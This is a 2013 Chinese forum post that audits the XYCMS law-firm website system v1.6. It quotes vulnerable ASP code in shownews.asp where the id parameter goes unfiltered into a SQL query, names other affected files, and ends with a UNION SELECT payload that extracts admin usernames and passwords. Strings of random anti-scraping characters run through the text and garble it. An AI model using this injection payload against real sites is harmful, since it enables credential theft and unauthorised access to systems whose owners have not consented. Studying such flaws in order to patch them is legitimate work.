前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
' @: J o5 m6 j2 L3 y. c 4 K$ t7 H) ]4 J
淫荡分割线
: C+ D' {% @1 p4 U3 @--------------------------------------------------------
# h4 m- d& z$ v9 B5 v$ V5 F; r " A0 f+ A: b0 L* h( {1 t/ V8 O
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
; t5 l% m. m- G/ G, C+ G' p源码地址:http://down.chinaz.com/soft/29233.htm+ g/ w6 d1 ?+ e# J
3 L; |5 |3 y& F) ~( C漏洞文件:shownews.asp6 r9 q7 `/ Q2 V9 j( x
漏洞代码:7-13行
7 R* k3 a# }* I3 ?5 N 8 ^# E4 F8 O2 S& A6 m, i2 Z
6 t7 @) `. z8 X" u# H5 D! K+ ?
<%
, N: t; f1 s; V# C' ?. Xid=request.QueryString("id")6 m4 b) L. f8 v/ l/ y- \
2 F0 d3 C# W7 D
set snews=server.createobject("adodb.recordset")
- d" l# ? ^. J/ kexec="select * from [news] where id="&id
% c% g# ~: }0 I1 X. D/ ^snews.open exec,conn,1,1
* q) J1 R' M% ~' G# E8 R%>* H( B Y2 v7 v) S3 e
3 q. s+ O1 A2 n( x
D" F. j, v% j5 r N/ i什么过滤都没有 直造成注入
4 l# ]. S' V. T
v' L; A7 m4 z' O) K注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 \2 @( C1 w5 Q% \ 6 W! w- i2 e2 A2 E* ~0 t, a* G
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
q1 S. z: {# r5 S
% Z+ V( I4 c9 C9 l% I* l6 r
1 j& ?& c1 J4 ^' s, o! vexp: union select 1,admin,password,4,5,7 from admin_user
* V9 F5 F* |5 F" Q. c2 x6 Z) C( ]: N5 F
|
发表于 2013-4-4 17:28:12
收藏
支持
反对